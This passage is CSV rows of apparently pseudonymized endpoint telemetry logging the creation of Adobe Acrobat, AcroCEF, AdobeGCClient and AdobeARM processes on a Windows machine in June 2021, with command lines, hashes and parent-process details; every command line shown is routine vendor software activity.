+51,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:19:00.244785800+00:00,10080,AdobeGCClient.exe,"""AdobeGCClient.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a17644"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a17644""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AdobeGCClient.exe,6743752,99b696fe03a14bd322f39fc35827e487,b57aab0a87e6c85ddf061a0a10bc10b96c61ae827fbb61f514a1df9fffcf263f,43d2475f42eeacb434b632975a33ebc8979a95b3,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:19:00.185975300+00:00,11124,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a17644"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a17644""",False,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:19:00.420490400+00:00,2021-06-24 03:21:31.820047600+00:00,0809f927-ce43-49f7-8070-d8ce489e5a82,computerpii_0a470890c60768167990033d701e7bd881398861,174110,False,10.7740.19041.1052,False,11540474045176213,,11540474045176216,2021-06-24 03:19:00.185975300+00:00,11124,2021-06-24 03:19:00.185975300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,11124,128,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-24 03:19:00.214075400+00:00,2020-09-22 19:30:00+00:00,2304,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClient,AdobeGCClient.exe,Adobe GC Client Application
+52,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:19:02.121901+00:00,18448,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:18:58.493511600+00:00,17444,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Downloads\FilePII_078283040e9b0a98aca7d0d9108d59efb1e7f921.pdf""",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:19:02.255420600+00:00,2021-06-24 03:21:31.820615200+00:00,0dcc26dd-0ef8-428c-baa1-500034a57482,computerpii_0a470890c60768167990033d701e7bd881398861,174120,False,10.7740.19041.1052,False,11540474045176201,,11540474045176219,2021-06-24 03:18:58.493511600+00:00,17444,2021-06-24 03:18:58.493511600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,17444,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,3796704,2021-05-28 05:30:12+00:00,2021-05-28 05:58:58+00:00,2021-06-24 03:18:58.497405900+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1025.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC ,,,,,,
+53,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:19:02.367078400+00:00,10404,AcroCEF.exe,"""AcroCEF.exe"" --type=renderer --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --touch-events=enabled --field-trial-handle=1904,3884124000123788739,13008496054867946898,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-gpu-compositing --lang=en-US --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=12849737866661066195 --renderer-client-id=2 --mojo-platform-channel-handle=1916 --allow-no-sandbox-job /prefetch:1",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:19:02.121901+00:00,18448,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-24 03:18:58.493511600+00:00,17444,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:19:02.411314400+00:00,2021-06-24 03:21:31.820768400+00:00,ebad3cd3-5323-432e-b39f-85f7569348eb,computerpii_0a470890c60768167990033d701e7bd881398861,174122,False,10.7740.19041.1052,False,11540474045176219,,11540474045176220,2021-06-24 03:19:02.121901+00:00,18448,2021-06-24 03:19:02.121901+00:00,AcroCEF.exe,18448,256,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-24 03:19:02.124383400+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+54,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:19:02.376315900+00:00,7964,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1904,3884124000123788739,13008496054867946898,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=9719376335685840001 --mojo-platform-channel-handle=1868 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:19:02.121901+00:00,18448,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-24 03:18:58.493511600+00:00,17444,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:19:02.411910200+00:00,2021-06-24 03:21:31.820852900+00:00,736bbf2f-69e3-47ed-a805-a18107307e6e,computerpii_0a470890c60768167990033d701e7bd881398861,174123,False,10.7740.19041.1052,False,11540474045176219,,11540474045176221,2021-06-24 03:19:02.121901+00:00,18448,2021-06-24 03:19:02.121901+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,18448,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-24 03:19:02.124383400+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+55,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:19:02.476394800+00:00,12836,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1904,3884124000123788739,13008496054867946898,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=13743157087614597640 --mojo-platform-channel-handle=2240 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:19:02.121901+00:00,18448,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-24 03:18:58.493511600+00:00,17444,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:19:02.492626200+00:00,2021-06-24 03:21:31.821022100+00:00,50ae85f6-b8fb-4e75-b8a0-51d55c6d74f1,computerpii_0a470890c60768167990033d701e7bd881398861,174125,False,10.7740.19041.1052,False,11540474045176219,,11540474045176222,2021-06-24 03:19:02.121901+00:00,18448,2021-06-24 03:19:02.121901+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,18448,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-24 03:19:02.124383400+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+56,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:19:02.591289900+00:00,3000,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1904,3884124000123788739,13008496054867946898,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=12788414546548583518 --mojo-platform-channel-handle=2280 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:19:02.121901+00:00,18448,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-24 03:18:58.493511600+00:00,17444,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:19:02.624884800+00:00,2021-06-24 03:21:31.821108+00:00,27d2e8af-add4-436a-a815-6bdc851349c6,computerpii_0a470890c60768167990033d701e7bd881398861,174126,False,10.7740.19041.1052,False,11540474045176219,,11540474045176223,2021-06-24 03:19:02.121901+00:00,18448,2021-06-24 03:19:02.121901+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,18448,16512,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-24 03:19:02.124383400+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+57,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:19:03.977323500+00:00,1372,AcroCEF.exe,"""AcroCEF.exe"" --type=renderer --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --touch-events=enabled --field-trial-handle=1904,3884124000123788739,13008496054867946898,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-gpu-compositing --lang=en-US --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=8088727250605482275 --renderer-client-id=6 --mojo-platform-channel-handle=2304 --allow-no-sandbox-job /prefetch:1",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:19:02.121901+00:00,18448,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-24 03:18:58.493511600+00:00,17444,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:19:03.998643500+00:00,2021-06-24 03:21:31.821577200+00:00,2c5bc068-f969-41b9-b5a5-a2cf5272003d,computerpii_0a470890c60768167990033d701e7bd881398861,174132,False,10.7740.19041.1052,False,11540474045176219,,11540474045176224,2021-06-24 03:19:02.121901+00:00,18448,2021-06-24 03:19:02.121901+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,18448,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-24 03:19:02.124383400+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+58,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:19:06.611635300+00:00,6560,AdobeARM.exe,"""AdobeARM.exe"" /PRODUCT:Acrobat /VERSION:21.0 /MODE:3",PortableExecutable,2021-01-25 13:55:56+00:00,C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,1557200,b8b96354dd88484208f17101f6704f7c,ad25d9f873a80f454ce2acbb75246463070e216c89b042ee87b9a6204dd146c0,68815c39f47a0b8f766d9191e7ac55d3199d1c96,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:18:58.493511600+00:00,17444,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Downloads\FilePII_078283040e9b0a98aca7d0d9108d59efb1e7f921.pdf""",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:19:06.658953200+00:00,2021-06-24 03:21:31.822917500+00:00,6a8c0ed6-433b-46d4-ac96-0c2448e2fbe6,computerpii_0a470890c60768167990033d701e7bd881398861,174160,False,10.7740.19041.1052,False,11540474045176201,,11540474045176225,2021-06-24 03:18:58.493511600+00:00,17444,2021-06-24 03:18:58.493511600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,17444,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,3796704,2021-05-28 05:30:12+00:00,2021-05-28 05:58:58+00:00,2021-06-24 03:18:58.497405900+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1025.0,10.0,1.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC ,Adobe Inc.,Adobe Reader and Acrobat Manager,1.824.42.0176,AdobeARM.exe,AdobeARM.exe,Adobe Reader and Acrobat Manager
+59,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:19:34.591742600+00:00,13104,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Downloads\FilePII_1b772b92aa4a5f1af2356bed64e961eaa7bdee0c.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat 